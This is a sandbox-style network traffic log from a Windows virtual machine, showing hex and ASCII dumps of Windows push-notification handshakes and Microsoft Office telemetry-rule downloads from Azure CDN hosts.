9b66123612672a77<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXzUEk3NfYh9D7JEZVblQpzbUhI51nLq1lyxsIeplPXorOyRIVHnuS+Qin2cjQ8GxlRfe/frS8nN53EkPVIgZTvLczCtK/tKxkNlEf93HaKC9K
2024-11-25 23:25:08 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 36 73 4c 6d 62 46 61 55 53 55 6d 7a 48 35 2f 35 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 62 36 36 31 32 33 36 31 32 36 37 32 61 37 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 6sLmbFaUSUmzH5/5.3Context: 9b66123612672a77<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-25 23:25:08 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-25 23:25:08 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 64 55 44 62 47 68 65 32 4b 6b 65 42 69 66 6d 4e 7a 32 4f 70 4a 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: dUDbGhe2KkeBifmNz2OpJQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.6	49714	20.198.119.143	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:11 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 44 41 72 65 71 39 75 2b 39 30 47 52 6f 6f 53 4d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 30 62 65 39 39 36 66 65 34 30 35 62 30 36 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: DAreq9u+90GRooSM.1Context: b0be996fe405b06f
2024-11-25 23:25:11 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-25 23:25:11 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 44 41 72 65 71 39 75 2b 39 30 47 52 6f 6f 53 4d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 30 62 65 39 39 36 66 65 34 30 35 62 30 36 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 35 77 4f 39 68 76 62 45 4d 2b 69 53 66 45 2b 38 44 46 45 6f 61 6d 47 46 76 53 62 58 34 48 49 51 59 4b 35 45 4b 78 75 36 71 38 39 54 39 4f 4a 6e 46 63 44 4f 72 39 65 57 4d 58 41 64 56 37 4b 38 6a 69 4f 45 35 51 2f 38 52 49 4b 4a 69 65 49 72 4b 72 54 5a 4c 75 38 52 48 6d 6c 4b 50 63 2b 63 66 46 50 35 42 4f 44 44 46 6f 32 35 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: DAreq9u+90GRooSM.2Context: b0be996fe405b06f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe5wO9hvbEM+iSfE+8DFEoamGFvSbX4HIQYK5EKxu6q89T9OJnFcDOr9eWMXAdV7K8jiOE5Q/8RIKJieIrKrTZLu8RHmlKPc+cfFP5BODDFo25
2024-11-25 23:25:11 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 44 41 72 65 71 39 75 2b 39 30 47 52 6f 6f 53 4d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 30 62 65 39 39 36 66 65 34 30 35 62 30 36 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: DAreq9u+90GRooSM.3Context: b0be996fe405b06f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-25 23:25:12 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-25 23:25:12 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 70 63 4c 77 6b 4f 46 42 74 30 47 73 52 36 79 37 34 32 46 2f 52 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: pcLwkOFBt0GsR6y742F/RA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.6	49716	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:14 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:15 UTC	472	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:14 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Mon, 25 Nov 2024 13:17:46 GMT ETag: "0x8DD0D538D5EA1E0" x-ms-request-id: f5f75198-101e-00a2-8091-3f9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232514Z-174f7845968ljs8phC1EWRe6en0000000ue00000000003g9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:15 UTC	15912	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-25 23:25:15 UTC	16384	IN	Data Raw: 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a Data Ascii: " /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-25 23:25:15 UTC	16384	IN	Data Raw: 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e Data Ascii: 1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-25 23:25:15 UTC	16384	IN	Data Raw: 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a Data Ascii: > </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-25 23:25:15 UTC	16384	IN	Data Raw: 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-25 23:25:15 UTC	16384	IN	Data Raw: 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f Data Ascii: "Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerso
2024-11-25 23:25:15 UTC	16384	IN	Data Raw: 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400
2024-11-25 23:25:15 UTC	16384	IN	Data Raw: 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f Data Ascii: > </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </
2024-11-25 23:25:15 UTC	16384	IN	Data Raw: 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-25 23:25:15 UTC	16384	IN	Data Raw: 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 Data Ascii: tus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.6	49718	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:17 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:18 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:18 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232518Z-174f7845968j6t2phC1EWRcfe80000000uv00000000000qx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:18 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.6	49717	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:17 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:18 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:18 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232518Z-174f7845968kvnqxhC1EWRmf3g0000000deg0000000001gw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:18 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.6	49719	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:17 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:18 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:18 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232518Z-174f7845968kvnqxhC1EWRmf3g0000000dd0000000000253 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
